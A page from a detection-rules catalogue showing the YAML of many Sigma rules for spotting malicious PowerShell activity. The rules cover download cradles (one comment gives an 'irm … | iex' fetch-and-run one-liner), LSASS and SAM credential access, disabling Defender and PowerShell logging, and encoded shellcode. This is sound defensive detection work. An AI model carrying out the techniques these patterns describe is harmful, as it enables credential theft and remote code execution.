Tool
SIEM
Sigma (generic) detection rules
1,715 rules indexed · SIEM-agnostic detection content
Sigma is the open generic signature format for SIEM systems. Expand any rule to see its raw YAML and convert it inline to native query syntax. Pick a platform above to browse every rule already rendered in that language.
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
◈
Detection rules
50 shown of 1,715
high
PowerShell Base64 Encoded FromBase64String Cmdlet
Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
view Sigma YAML
title: PowerShell Base64 Encoded FromBase64String Cmdlet
id: fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c
status: test
description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
references:
- Internal Research
author: Florian Roth (Nextron Systems)
date: 2019-08-24
modified: 2023-04-06
tags:
- attack.stealth
- attack.t1140
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection:
- CommandLine|base64offset|contains: '::FromBase64String'
# UTF-16 LE
- CommandLine|contains:
- 'OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA'
- 'oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA'
- '6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
PowerShell Base64 Encoded IEX Cmdlet
Detects usage of a base64 encoded "IEX" cmdlet in a process command line
view Sigma YAML
title: PowerShell Base64 Encoded IEX Cmdlet
id: 88f680b8-070e-402c-ae11-d2914f2257f1
status: test
description: Detects usage of a base64 encoded "IEX" cmdlet in a process command line
references:
- Internal Research
author: Florian Roth (Nextron Systems)
date: 2019-08-23
modified: 2023-04-06
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection:
- CommandLine|base64offset|contains:
- 'IEX (['
- 'iex (['
- 'iex (New'
- 'IEX (New'
- 'IEX(['
- 'iex(['
- 'iex(New'
- 'IEX(New'
- "IEX(('"
- "iex(('"
# UTF16 LE
- CommandLine|contains:
- 'SQBFAFgAIAAoAFsA'
- 'kARQBYACAAKABbA'
- 'JAEUAWAAgACgAWw'
- 'aQBlAHgAIAAoAFsA'
- 'kAZQB4ACAAKABbA'
- 'pAGUAeAAgACgAWw'
- 'aQBlAHgAIAAoAE4AZQB3A'
- 'kAZQB4ACAAKABOAGUAdw'
- 'pAGUAeAAgACgATgBlAHcA'
- 'SQBFAFgAIAAoAE4AZQB3A'
- 'kARQBYACAAKABOAGUAdw'
- 'JAEUAWAAgACgATgBlAHcA'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
PowerShell Base64 Encoded Invoke Keyword
Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls
view Sigma YAML
title: PowerShell Base64 Encoded Invoke Keyword
id: 6385697e-9f1b-40bd-8817-f4a91f40508e
related:
- id: fd6e2919-3936-40c9-99db-0aa922c356f7
type: obsolete
status: test
description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls
references:
- https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t
date: 2022-05-20
modified: 2023-04-06
tags:
- attack.execution
- attack.stealth
- attack.t1059.001
- attack.t1027
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
- OriginalFileName:
- 'PowerShell.EXE'
- 'pwsh.dll'
selection_cli_enc:
CommandLine|contains: ' -e'
selection_cli_invoke:
CommandLine|contains:
# Invoke-
# UTF-16LE
- 'SQBuAHYAbwBrAGUALQ'
- 'kAbgB2AG8AawBlAC0A'
- 'JAG4AdgBvAGsAZQAtA'
# UTF-8
- 'SW52b2tlL'
- 'ludm9rZS'
- 'JbnZva2Ut'
condition: all of selection_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
PowerShell Base64 Encoded Reflective Assembly Load
Detects base64 encoded .NET reflective loading of Assembly
view Sigma YAML
title: PowerShell Base64 Encoded Reflective Assembly Load
id: 62b7ccc9-23b4-471e-aa15-6da3663c4d59
related:
- id: 9c0295ce-d60d-40bd-bd74-84673b7592b1
type: similar
status: test
description: Detects base64 encoded .NET reflective loading of Assembly
references:
- https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar
- https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
author: Christian Burkard (Nextron Systems), pH-T (Nextron Systems)
date: 2022-03-01
modified: 2023-01-30
tags:
- attack.execution
- attack.stealth
- attack.t1059.001
- attack.t1027
- attack.t1620
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
# [Reflection.Assembly]::Load(
- 'WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA'
- 'sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA'
- 'bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA'
# [reflection.assembly]::("Load")
- 'AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC'
- 'BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp'
- 'AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK'
# [Reflection.Assembly]::("Load")
- 'WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ'
- 'sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA'
- 'bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA'
# [reflection.assembly]::Load(
- 'WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA'
- 'sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA'
- 'bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
PowerShell Base64 Encoded WMI Classes
Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc.
view Sigma YAML
title: PowerShell Base64 Encoded WMI Classes
id: 1816994b-42e1-4fb1-afd2-134d88184f71
related:
- id: 47688f1b-9f51-4656-b013-3cc49a166a36
type: obsolete
status: test
description: Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc.
references:
- https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar
author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-30
tags:
- attack.execution
- attack.stealth
- attack.t1059.001
- attack.t1027
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
- OriginalFileName:
- 'PowerShell.EXE'
- 'pwsh.dll'
selection_cli_shadowcopy:
# Win32_ShadowCopy
CommandLine|contains:
- 'VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ'
- 'cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA'
- 'XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A'
- 'V2luMzJfU2hhZG93Y29we'
- 'dpbjMyX1NoYWRvd2NvcH'
- 'XaW4zMl9TaGFkb3djb3B5'
selection_cli_scheduledJob:
# Win32_ScheduledJob
CommandLine|contains:
- 'VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA'
- 'cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA'
- 'XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg'
- 'V2luMzJfU2NoZWR1bGVkSm9i'
- 'dpbjMyX1NjaGVkdWxlZEpvY'
- 'XaW4zMl9TY2hlZHVsZWRKb2'
selection_cli_process:
# Win32_Process
CommandLine|contains:
- 'VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw'
- 'cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA'
- 'XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA'
- 'V2luMzJfUHJvY2Vzc'
- 'dpbjMyX1Byb2Nlc3'
- 'XaW4zMl9Qcm9jZXNz'
selection_cli_useraccount:
# Win32_UserAccount
CommandLine|contains:
- 'VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A'
- 'cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA'
- 'XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA'
- 'V2luMzJfVXNlckFjY291bn'
- 'dpbjMyX1VzZXJBY2NvdW50'
- 'XaW4zMl9Vc2VyQWNjb3Vud'
selection_cli_loggedonuser:
# Win32_LoggedOnUser
CommandLine|contains:
- 'VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA'
- 'cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA'
- 'XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg'
- 'V2luMzJfTG9nZ2VkT25Vc2Vy'
- 'dpbjMyX0xvZ2dlZE9uVXNlc'
- 'XaW4zMl9Mb2dnZWRPblVzZX'
condition: selection_img and 1 of selection_cli_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
PowerShell Called from an Executable Version Mismatch
Detects PowerShell called from an executable by the version mismatch method
view Sigma YAML
title: PowerShell Called from an Executable Version Mismatch
id: c70e019b-1479-4b65-b0cc-cd0c6093a599
status: test
description: Detects PowerShell called from an executable by the version mismatch method
references:
- https://adsecurity.org/?p=2921
author: Sean Metcalf (source), Florian Roth (Nextron Systems)
date: 2017-03-05
modified: 2023-10-27
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: ps_classic_start
detection:
selection_engine:
Data|contains:
- 'EngineVersion=2.'
- 'EngineVersion=4.'
- 'EngineVersion=5.'
selection_host:
Data|contains: 'HostVersion=3.'
condition: all of selection_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
PowerShell Credential Prompt
Detects PowerShell calling a credential prompt
view Sigma YAML
title: PowerShell Credential Prompt
id: ca8b77a9-d499-4095-b793-5d5f330d450e
status: test
description: Detects PowerShell calling a credential prompt
references:
- https://twitter.com/JohnLaTwC/status/850381440629981184
- https://t.co/ezOTGy1a1G
author: John Lambert (idea), Florian Roth (Nextron Systems)
date: 2017-04-09
modified: 2022-12-25
tags:
- attack.credential-access
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains: 'PromptForCredential'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction'
Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9').
This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level.
An attacker might use this technique via the command line to bypass defenses before executing payloads.
view Sigma YAML
title: PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction'
id: 1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e
related:
- id: 5a9e1b2c-8f7d-4a1e-9b3c-0f6d7e5a4b1f
type: similar
status: experimental
description: |
Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9').
This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level.
An attacker might use this technique via the command line to bypass defenses before executing payloads.
references:
- https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference
- https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-threatseveritydefaultaction
- https://research.splunk.com/endpoint/7215831c-8252-4ae3-8d43-db588e82f952
- https://gist.github.com/Dump-GUY/8daef859f382b895ac6fd0cf094555d2
- https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/
author: 'Matt Anderson (Huntress)'
date: 2025-07-11
tags:
- attack.defense-impairment
- attack.t1685
logsource:
category: process_creation
product: windows
detection:
selection_cmdlet:
CommandLine|contains: 'Set-MpPreference'
selection_action:
CommandLine|contains:
- '-LowThreatDefaultAction'
- '-ModerateThreatDefaultAction'
- '-HighThreatDefaultAction'
- '-SevereThreatDefaultAction'
- '-ltdefac '
- '-mtdefac '
- '-htdefac '
- '-stdefac '
selection_value:
CommandLine|contains:
- 'Allow'
- '6'
- 'NoAction'
- '9'
condition: all of selection_*
falsepositives:
- Highly unlikely
level: high
Convert to SIEM query
high
PowerShell Download and Execution Cradles
Detects PowerShell download and execution cradles.
view Sigma YAML
title: PowerShell Download and Execution Cradles
id: 85b0b087-eddf-4a2b-b033-d771fa2b9775
status: test
description: Detects PowerShell download and execution cradles.
references:
- https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd
- https://labs.withsecure.com/publications/fin7-target-veeam-servers
author: Florian Roth (Nextron Systems)
date: 2022-03-24
modified: 2025-07-18
tags:
- attack.execution
- attack.t1059
logsource:
product: windows
category: process_creation
detection:
selection_download:
CommandLine|contains:
- '.DownloadString('
- '.DownloadFile('
- 'Invoke-WebRequest '
- 'iwr '
- 'Invoke-RestMethod '
- 'irm ' # powershell -ep bypass -w h -c irm test.domain/ffe | iex
selection_iex:
CommandLine|contains:
- ';iex $'
- '| IEX'
- '|IEX '
- 'I`E`X'
- 'I`EX'
- 'IE`X'
- 'iex '
- 'IEX ('
- 'IEX('
- 'Invoke-Expression'
condition: all of selection_*
falsepositives:
- Some PowerShell installers were seen using similar combinations. Apply filters accordingly
level: high
Convert to SIEM query
high
PowerShell Execution With Potential Decryption Capabilities
Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware.
view Sigma YAML
title: PowerShell Execution With Potential Decryption Capabilities
id: 434c08ba-8406-4d15-8b24-782cb071a691
status: test
description: Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware.
references:
- https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/
author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-30
modified: 2023-12-05
tags:
- attack.execution
logsource:
product: windows
category: process_creation
detection:
selection_img:
Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
OriginalFileName:
- 'PowerShell.EXE'
- 'pwsh.dll'
selection_cli_dir:
CommandLine|contains:
- "Get-ChildItem "
- "dir "
- "gci "
- "ls "
selection_cli_gc:
CommandLine|contains:
- "Get-Content "
- "gc "
- 'cat '
- 'type '
- 'ReadAllBytes'
selection_cli_specific:
- CommandLine|contains|all:
- ' ^| '
- '\*.lnk'
- '-Recurse'
- '-Skip '
- CommandLine|contains|all:
- ' -ExpandProperty '
- '\*.lnk'
- 'WriteAllBytes'
- ' .length '
condition: all of selection_*
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
PowerShell Get-Process LSASS
Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity
view Sigma YAML
title: PowerShell Get-Process LSASS
id: b2815d0d-7481-4bf0-9b6c-a4c48a94b349
status: test
description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity
references:
- https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211
author: Florian Roth (Nextron Systems)
date: 2021-04-23
modified: 2023-01-05
tags:
- attack.credential-access
- attack.t1552.004
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
# You can add more permutation as you see fit
- 'Get-Process lsas'
- 'ps lsas'
- 'gps lsas'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
PowerShell Get-Process LSASS in ScriptBlock
Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity
view Sigma YAML
title: PowerShell Get-Process LSASS in ScriptBlock
id: 84c174ab-d3ef-481f-9c86-a50d0b8e3edb
status: test
description: Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity
references:
- https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211
author: Florian Roth (Nextron Systems)
date: 2021-04-23
modified: 2022-12-25
tags:
- attack.credential-access
- attack.t1003.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains: 'Get-Process lsass'
condition: selection
falsepositives:
- Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)
level: high
Convert to SIEM query
high
PowerShell Logging Disabled Via Registry Key Tampering
Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging
view Sigma YAML
title: PowerShell Logging Disabled Via Registry Key Tampering
id: fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7
status: test
description: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled
author: frack113
date: 2022-04-02
modified: 2023-08-17
tags:
- attack.stealth
- attack.defense-impairment
- attack.t1564.001
- attack.t1112
- attack.persistence
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains:
- '\Microsoft\Windows\PowerShell\' # PowerShell 5
- '\Microsoft\PowerShellCore\' # PowerShell 7
TargetObject|endswith:
- '\ModuleLogging\EnableModuleLogging'
- '\ScriptBlockLogging\EnableScriptBlockLogging'
- '\ScriptBlockLogging\EnableScriptBlockInvocationLogging'
- '\Transcription\EnableTranscripting'
- '\Transcription\EnableInvocationHeader'
- '\EnableScripts'
Details: 'DWORD (0x00000000)'
condition: selection
falsepositives:
- Unknown
level: high
regression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled/info.yml
simulation:
- type: atomic-red-team
name: Disable PowerShell Logging via Registry
technique: T1112
atomic_guid: 95b25212-91a7-42ff-9613-124aca6845a8
Convert to SIEM query
high
PowerShell PSAttack
Detects the use of PSAttack PowerShell hack tool
view Sigma YAML
title: PowerShell PSAttack
id: b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5
status: test
description: Detects the use of PSAttack PowerShell hack tool
references:
- https://adsecurity.org/?p=2921
author: Sean Metcalf (source), Florian Roth (Nextron Systems)
date: 2017-03-05
modified: 2022-12-25
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains: 'PS ATTACK!!!'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
PowerShell SAM Copy
Detects suspicious PowerShell scripts accessing SAM hives
view Sigma YAML
title: PowerShell SAM Copy
id: 1af57a4b-460a-4738-9034-db68b880c665
status: test
description: Detects suspicious PowerShell scripts accessing SAM hives
references:
- https://twitter.com/splinter_code/status/1420546784250769408
author: Florian Roth (Nextron Systems)
date: 2021-07-29
modified: 2023-01-06
tags:
- attack.credential-access
- attack.t1003.002
logsource:
category: process_creation
product: windows
detection:
selection_1:
CommandLine|contains|all:
- '\HarddiskVolumeShadowCopy'
- 'System32\config\sam'
selection_2:
CommandLine|contains:
- 'Copy-Item'
- 'cp $_.'
- 'cpi $_.'
- 'copy $_.'
- '.File]::Copy('
condition: all of selection*
falsepositives:
- Some rare backup scenarios
- PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs
level: high
Convert to SIEM query
high
PowerShell Script Change Permission Via Set-Acl
Detects PowerShell execution to set the ACL of a file or a folder
view Sigma YAML
title: PowerShell Script Change Permission Via Set-Acl
id: bdeb2cff-af74-4094-8426-724dc937f20a
related:
- id: cae80281-ef23-44c5-873b-fd48d2666f49 # PsScript Low
type: derived
- id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp
type: derived
- id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 # PsScript High
type: derived
status: test
description: Detects PowerShell execution to set the ACL of a file or a folder
references:
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1
- https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-18
tags:
- attack.stealth
logsource:
category: process_creation
product: windows
detection:
selection_img:
- OriginalFileName:
- 'PowerShell.EXE'
- 'pwsh.dll'
- Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
selection_cmdlet:
CommandLine|contains|all:
- 'Set-Acl '
- '-AclObject '
- '-Path '
condition: all of selection_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
PowerShell Scripts Installed as Services
Detects powershell script installed as a Service
view Sigma YAML
title: PowerShell Scripts Installed as Services
id: a2e5019d-a658-4c6a-92bf-7197b54e2cae
status: test
description: Detects powershell script installed as a Service
references:
- https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
author: oscd.community, Natalia Shornikova
date: 2020-10-06
modified: 2022-12-25
tags:
- attack.execution
- attack.t1569.002
logsource:
product: windows
service: system
detection:
selection:
Provider_Name: 'Service Control Manager'
EventID: 7045
ImagePath|contains:
- 'powershell'
- 'pwsh'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
PowerShell Scripts Installed as Services - Security
Detects powershell script installed as a Service
view Sigma YAML
title: PowerShell Scripts Installed as Services - Security
id: 2a926e6a-4b81-4011-8a96-e36cc8c04302
related:
- id: a2e5019d-a658-4c6a-92bf-7197b54e2cae
type: derived
status: test
description: Detects powershell script installed as a Service
references:
- https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
author: oscd.community, Natalia Shornikova
date: 2020-10-06
modified: 2022-11-29
tags:
- attack.execution
- attack.t1569.002
logsource:
product: windows
service: security
definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697
detection:
selection:
EventID: 4697
ServiceFileName|contains:
- 'powershell'
- 'pwsh'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
PowerShell Set-Acl On Windows Folder
Detects PowerShell scripts to set the ACL to a file in the Windows folder
view Sigma YAML
title: PowerShell Set-Acl On Windows Folder
id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp
related:
- id: cae80281-ef23-44c5-873b-fd48d2666f49 # PsScript Low
type: derived
- id: bdeb2cff-af74-4094-8426-724dc937f20a # ProcCreation Low
type: derived
- id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 # PsScript High
type: derived
status: test
description: Detects PowerShell scripts to set the ACL to a file in the Windows folder
references:
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1
- https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-18
tags:
- attack.stealth
logsource:
category: process_creation
product: windows
detection:
selection_img:
- OriginalFileName:
- 'PowerShell.EXE'
- 'pwsh.dll'
- Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
selection_cmdlet:
CommandLine|contains|all:
- 'Set-Acl '
- '-AclObject '
selection_paths:
# Note: Add more suspicious paths
CommandLine|contains:
- '-Path "C:\Windows'
- "-Path 'C:\\Windows"
- '-Path %windir%'
- '-Path $env:windir'
selection_permissions:
# Note: Add more suspicious permissions
CommandLine|contains:
- 'FullControl'
- 'Allow'
condition: all of selection_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
PowerShell Set-Acl On Windows Folder - PsScript
Detects PowerShell scripts to set the ACL to a file in the Windows folder
view Sigma YAML
title: PowerShell Set-Acl On Windows Folder - PsScript
id: 3bf1d859-3a7e-44cb-8809-a99e066d3478
related:
- id: cae80281-ef23-44c5-873b-fd48d2666f49 # PsScript Low
type: derived
- id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp
type: derived
- id: bdeb2cff-af74-4094-8426-724dc937f20a # ProcCreation Low
type: derived
status: test
description: Detects PowerShell scripts to set the ACL to a file in the Windows folder
references:
- https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1
author: frack113, Nasreddine Bencherchali (Nextron Systems)
date: 2023-07-18
tags:
- attack.defense-impairment
- attack.t1222
logsource:
product: windows
category: ps_script
definition: bade5735-5ab0-4aa7-a642-a11be0e40872
detection:
selection_cmdlet:
ScriptBlockText|contains|all:
- 'Set-Acl '
- '-AclObject '
selection_paths:
# Note: Add more suspicious paths
ScriptBlockText|contains:
- '-Path "C:\Windows'
- '-Path "C:/Windows'
- "-Path 'C:\\Windows"
- "-Path 'C:/Windows"
- '-Path C:\\Windows'
- '-Path C:/Windows'
- '-Path $env:windir'
- '-Path "$env:windir'
- "-Path '$env:windir"
selection_permissions:
# Note: Add more suspicious permissions
ScriptBlockText|contains:
- 'FullControl'
- 'Allow'
condition: all of selection_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
PowerShell ShellCode
Detects Base64 encoded Shellcode
view Sigma YAML
title: PowerShell ShellCode
id: 16b37b70-6fcf-4814-a092-c36bd3aafcbd
status: test
description: Detects Base64 encoded Shellcode
references:
- https://twitter.com/cyb3rops/status/1063072865992523776
author: David Ledbetter (shellcode), Florian Roth (Nextron Systems)
date: 2018-11-17
modified: 2024-01-25
tags:
- attack.privilege-escalation
- attack.stealth
- attack.t1055
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains:
- 'OiCAAAAYInlM'
- 'OiJAAAAYInlM'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
PowerShell Web Access Feature Enabled Via DISM
Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse
view Sigma YAML
title: PowerShell Web Access Feature Enabled Via DISM
id: 7e8f2d3b-9c1a-4f67-b9e8-8d9006e0e51f
status: test
description: Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse
references:
- https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a
- https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41
author: Michael Haag
date: 2024-09-03
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1548.002
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\dism.exe'
- OriginalFileName: 'DISM.EXE'
selection_cli:
CommandLine|contains|all:
- 'WindowsPowerShellWebAccess'
- '/online'
- '/enable-feature'
condition: all of selection_*
falsepositives:
- Legitimate PowerShell Web Access installations by administrators
level: high
Convert to SIEM query
high
PowerShell Web Access Installation - PsScript
Detects the installation and configuration of PowerShell Web Access, which could be used for remote access and potential abuse
view Sigma YAML
title: PowerShell Web Access Installation - PsScript
id: 5f9c7f1a-7c21-4c39-b2f3-8d8006e0e51f
status: test
description: Detects the installation and configuration of PowerShell Web Access, which could be used for remote access and potential abuse
references:
- https://docs.microsoft.com/en-us/powershell/module/powershellwebaccess/install-pswawebapplication
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a
- https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41
author: Michael Haag
date: 2024-09-03
tags:
- attack.persistence
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection_install:
ScriptBlockText|contains: 'Install-WindowsFeature WindowsPowerShellWebAccess'
selection_config:
ScriptBlockText|contains: 'Install-PswaWebApplication'
selection_auth:
ScriptBlockText|contains|all:
- 'Add-PswaAuthorizationRule'
- '-UserName *'
- '-ComputerName *'
condition: 1 of selection_*
falsepositives:
- Legitimate PowerShell Web Access installations by administrators
level: high
Convert to SIEM query
high
PowerShell as a Service in Registry
Detects that a powershell code is written to the registry as a service.
view Sigma YAML
